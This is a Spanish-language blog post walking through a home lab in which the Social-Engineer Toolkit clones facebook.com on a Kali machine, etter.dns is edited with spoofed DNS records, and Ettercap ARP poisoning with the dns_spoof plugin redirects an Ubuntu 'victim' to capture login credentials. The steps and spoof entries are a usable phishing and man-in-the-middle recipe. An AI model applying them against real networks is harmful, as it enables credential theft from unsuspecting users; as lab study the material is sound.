viernes, 28 de marzo de 2014

ETTERCAP CLONE PAGE Como si estuviera en primero


Go!!!

1.- Como primer paso se verifico la configuración de las tarjetas de red para garantizar la comunicación enntre las maquinas.

  • Se apunta los dispositivos en Adaptador puente

2.- Se ejecuto el comando ifconfig para verificar las ips de cada máquina

kali -> 192.168.10.27/24

Ubuntu víctima -> 192-168.10.28/24

3.- Ingresamos a SE-TOOLKIT en Kali Linux

se-toolkit
4.- Elegimos la opción 1 Social- Engineer Attacks

5.- Luego opción 2 Website Attack Vectors

6.- Paso siguiente la opción 3 Credential Harvester Attack Method

7.- Y la opcion 2 Site Cloner

8.- Indicamos la IP a la que serán re direccionadas las víctimas en éste caso la ip de Kali Linux 192.168.10.27
9.- Ingresamos el sitio web a clonar: www.facebook.com

esperamos el mensaje de confirmación y listo, el sitio estará corriendo en nuestra máquina bajo el puerto 80.

ETTERCAP

A continuacion se procede a confirgurar el archivo etter.dns que se encuentra en Archivos-> usr/share/ettercap/etter.dns.

Editamos éste archivo agregando 3 líneas básicas:

www.facebook.com A 192.168.10.27
*.facebook.* A 192.168.10.27
facebook.com PTR 192.168.10.27

Donde 192.168.10.27 es la IP de Kali Linux

Damos click en guardar y cerramos el archivo

Abrimos otro terminal y tecleamos lo siguiente:

ettercap -G

Se abrira una interfaz gráfica de Ettercap, ésto hace más sencillo el proceso de sniffing

1.- Click en Sniff
2.- Unified sniffing
eth0
3.- Aceptar
4.- Hosts
5.- Scan for hosts
6.- Hosts
7.- Hosts list

Seleccionamos 192.168.10.20 y click en Add to Target 1 y luego seleccionamos a nuestra víctima en este caso la IP 192.168.10.28 y click en Add to Target 2.

8.- Click en Plugins y Manage the plugins
9.- Dar doble click en dns_spoof ya que este es nuestro obejtivo redireccionar los clientes a la IP que deseamos.
10.- Arp poisoning y seleccionamos Sniff remote connections. Ésto se conoce como MAN IN THE MIDDLE de esta forma escucharemos y capturaremos las credenciales de la víctima.

11.- Start -> Start sniffing

LISTO!!!

1 comentario: